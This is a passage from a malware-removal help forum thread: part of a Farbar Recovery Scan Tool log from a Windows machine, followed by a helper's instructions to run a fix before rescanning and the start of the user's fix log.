HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [EPSON Artisan 730 Series] => C:\windows\system32\spool\DRIVERS\W32X86\3\E_FATIHQA.EXE [212480 2011-01-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21444224 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x776496073BEDCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
SearchScopes: HKCU - {4FA18F2D-C961-4586-BD6C-A753A39CF7C1} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @mcafee.com/SAFFPlugin -> C:\Program Files\McAfee\SiteAdvisor\npmcffplg32.dll (McAfee, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-07-30]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-25]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2013-06-25]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
R2 EpsonCustomerParticipation; C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe [521600 2011-06-09] (SEIKO EPSON CORPORATION)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-09-04] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 cfwids; C:\windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
S3 HipShieldK; C:\windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [30976 2014-10-20] ()
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-26] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)
R3 mfeapfk; C:\windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
S3 mfebopk; C:\windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)
S3 mfencrk; C:\windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)
R0 mfewfpk; C:\windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)
R2 monblanking; C:\windows\System32\DRIVERS\monblanking.sys [29280 2014-09-04] (Citrix Systems, Inc.)
R3 SuperIO; C:\windows\System32\DRIVERS\spio.sys [11720 2009-06-05] ()
R2 WinI2C-DDC; C:\windows\system32\drivers\DDCDrv.sys [16200 2009-03-02] (Nicomsoft Ltd.)
S3 wsvd; C:\windows\System32\DRIVERS\wsvd.sys [81704 2009-07-21] (CyberLink)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-13] (Microsoft Corporation)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 21:56 - 2014-10-26 21:57 - 00016768 _____ () C:\Users\Jude\Documents\FRST.txt
2014-10-26 21:56 - 2014-10-26 21:56 - 00000000 ____D () C:\Users\Jude\Documents\FRST-OlderVersion
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-10-26 17:12 - 2014-10-26 17:12 - 00143944 _____ () C:\windows\Minidump\102614-13400-01.dmp
2014-10-24 20:38 - 2014-10-24 20:38 - 16281688 _____ () C:\Users\Jude\Downloads\RogueKiller.exe
2014-10-24 19:30 - 2014-10-26 21:56 - 00000000 ____D () C:\FRST
2014-10-24 19:19 - 2014-10-26 21:56 - 01104896 _____ (Farbar) C:\Users\Jude\Documents\FRST.exe
2014-10-24 19:14 - 2014-10-24 19:14 - 00000197 _____ () C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
2014-10-23 22:23 - 2014-10-23 22:23 - 00000247 _____ () C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-10-23 22:14 - 2014-10-24 19:39 - 00000000 ____D () C:\windows\455F074C814E4520B69B5584BD90400C.TMP
2014-10-23 22:14 - 2014-10-23 22:14 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-10-23 22:11 - 2014-10-23 22:10 - 00728960 _____ (Enigma Software Group USA, LLC.) C:\Users\Jude\Documents\SpyHunter-Installer.exe
2014-10-23 21:06 - 2014-10-23 21:06 - 00000197 _____ () C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
2014-10-23 20:57 - 2014-10-23 21:01 - 00000000 ____D () C:\AdwCleaner
2014-10-23 20:30 - 2014-10-23 20:30 - 00000000 ____D () C:\windows\system32\vbox
2014-10-23 20:25 - 2014-10-24 19:54 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-23 19:40 - 2014-10-23 19:41 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-23 12:36 - 2014-10-23 21:10 - 00000000 ____D () C:\Users\Jude\AppData\Local\CrashDumps
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\ProgramData\Sun
2014-10-22 23:37 - 2014-10-22 23:37 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-22 23:07 - 2014-10-22 23:08 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00001989 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00000000 ____D () C:\Program Files\Adobe
2014-10-20 21:34 - 2014-10-20 21:34 - 00000000 ____D () C:\Program Files\ESET
2014-10-20 21:07 - 2014-10-20 21:07 - 00030976 _____ () C:\windows\system32\Drivers\hitmanpro37.sys
2014-10-20 21:07 - 2014-10-20 21:07 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-10-20 20:22 - 2014-10-24 20:39 - 00034808 _____ () C:\windows\system32\Drivers\TrueSight.sys
2014-10-20 20:22 - 2014-10-20 20:22 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-20 20:13 - 2014-10-20 21:55 - 00000000 ____D () C:\windows\erdnt
2014-10-19 09:45 - 2014-10-26 19:25 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 09:35 - 2014-10-22 07:05 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 09:35 - 2014-10-22 07:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-22 07:05 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-19 09:34 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-16 06:01 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-16 06:01 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-16 06:00 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-16 06:00 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-16 06:00 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-16 06:00 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-16 06:00 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-16 06:00 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-16 06:00 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-16 06:00 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-16 06:00 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-16 06:00 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-16 06:00 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-16 06:00 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-16 06:00 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-16 06:00 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-16 06:00 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-16 06:00 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-16 06:00 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-16 06:00 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 06:00 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-16 06:00 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-16 06:00 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-16 06:00 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-16 06:00 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-16 06:00 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-16 06:00 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-16 06:00 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-16 05:59 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-16 05:59 - 2014-08-28 20:44 - 02744320 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-16 05:59 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-16 05:59 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-16 05:59 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-16 05:59 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-16 05:58 - 2014-08-29 20:50 - 05702656 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-08 16:48 - 2014-10-26 18:42 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-09-30 05:40 - 2014-09-30 05:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 19:30 - 2012-02-12 13:38 - 00000000 ____D () C:\Program Files\LTCM Client
2014-10-26 19:23 - 2011-04-23 12:56 - 00000000 ____D () C:\Program Files\Coupons
2014-10-26 18:56 - 2012-08-25 09:04 - 00001844 _____ () C:\Users\Public\Desktop\McAfee Internet Security.lnk
2014-10-26 18:49 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-26 18:49 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-26 18:45 - 2010-05-07 22:53 - 01713117 _____ () C:\windows\WindowsUpdate.log
2014-10-26 18:41 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-26 18:41 - 2009-07-13 23:39 - 00334395 _____ () C:\windows\setupact.log
2014-10-26 17:12 - 2014-07-05 15:34 - 315846567 _____ () C:\windows\MEMORY.DMP
2014-10-26 17:12 - 2014-07-05 15:34 - 00000000 ____D () C:\windows\Minidump
2014-10-24 19:54 - 2010-05-07 23:24 - 01133766 _____ () C:\windows\PFRO.log
2014-10-23 22:17 - 2010-08-14 11:20 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Skype
2014-10-23 20:13 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude\AppData\Local\VirtualStore
2014-10-22 23:19 - 2011-06-06 11:12 - 00000000 ____D () C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
2014-10-22 23:18 - 2013-08-03 08:13 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-10-22 23:18 - 2011-07-30 12:21 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-22 23:17 - 2010-08-29 13:04 - 00000000 ____D () C:\Users\Jude\AppData\Local\Adobe
2014-10-22 23:08 - 2011-07-30 12:19 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-22 23:07 - 2010-08-29 13:05 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-20 18:56 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\rescache
2014-10-19 09:35 - 2010-08-29 13:23 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Malwarebytes
2014-10-19 09:34 - 2010-08-29 13:23 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-16 16:07 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\Microsoft.NET
2014-10-16 09:16 - 2009-07-13 23:33 - 00408160 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-16 09:08 - 2013-08-03 08:26 - 00000000 ____D () C:\windows\system32\MRT
2014-10-16 09:01 - 2010-12-25 17:37 - 100290944 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-16 07:59 - 2011-09-01 13:39 - 00000000 ____D () C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
2014-10-06 11:15 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\system32\NDF
2014-10-01 11:11 - 2013-11-30 09:46 - 00023256 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-09-29 07:47 - 2009-07-13 23:53 - 00032632 _____ () C:\windows\Tasks\SCHEDLGU.TXT

Files to move or delete:
====================
C:\ProgramData\flashax10.exe
C:\Users\Jude\gotomypc_540.exe

Some content of TEMP:
====================
C:\Users\Jude\AppData\Local\Temp\catchme.dll
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
C:\Users\Jude\AppData\Local\Temp\MSN407.exe
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
C:\Users\Jude\AppData\Local\Temp\Refresh.exe
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-20 18:48

==================== End Of Log ============================

#6 Gunto (Malware Response Team)

Posted 27 October 2014 - 09:28 AM

Hi,

It's great that you managed to remove the Trojan. However, in the future, please don't run any scans (or other programs that affect your system similarly, for that matter) without asking me first. In this case, the results were positive, but sometimes scans can remove malware in such a way that it can damage your system. Even then, it's very difficult to keep up with the current status of your system if you don't tell me you're doing something first, or if you don't tell me at all.

Good work on getting rid of those programs.

It looks like you didn't run the FRST fix I asked you to, since many things I set to remove in it are still present on your system. Plus, you didn't post Fixlog.txt in your reply, only the new FRST.txt. If you did run the fix, please post the text file. If you didn't, please run the fix and then run a new FRST scan. It's very important that you run the fix first. :)

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...


#7 sysadmin74 (Topic Starter)

Posted 27 October 2014 - 10:24 AM

My apologies, I had a misunderstanding with the instructions.  Just so I'm clear, do you want me to run the fix first, post the fixlog.txt file in my reply, then run the FRST scan and post the results into the reply?



#8 Gunto (Malware Response Team)

Posted 27 October 2014 - 12:18 PM

Hi,

It's fine. :) You can run the fix and then run the new scan and post both at once, or you can post them separately if they're too long to post together (which they shouldn't be). In other words, you've understood me fine, but you're free to post both logs in the same post.

 

Gunto


#9 sysadmin74 (Topic Starter)

Posted 28 October 2014 - 05:54 PM

Here are the results from the fixlog file:


Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 26-10-2014
Ran by Jude at 2014-10-28 17:36:35 Run:1
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
HKLM\...\Run: [] => [X]
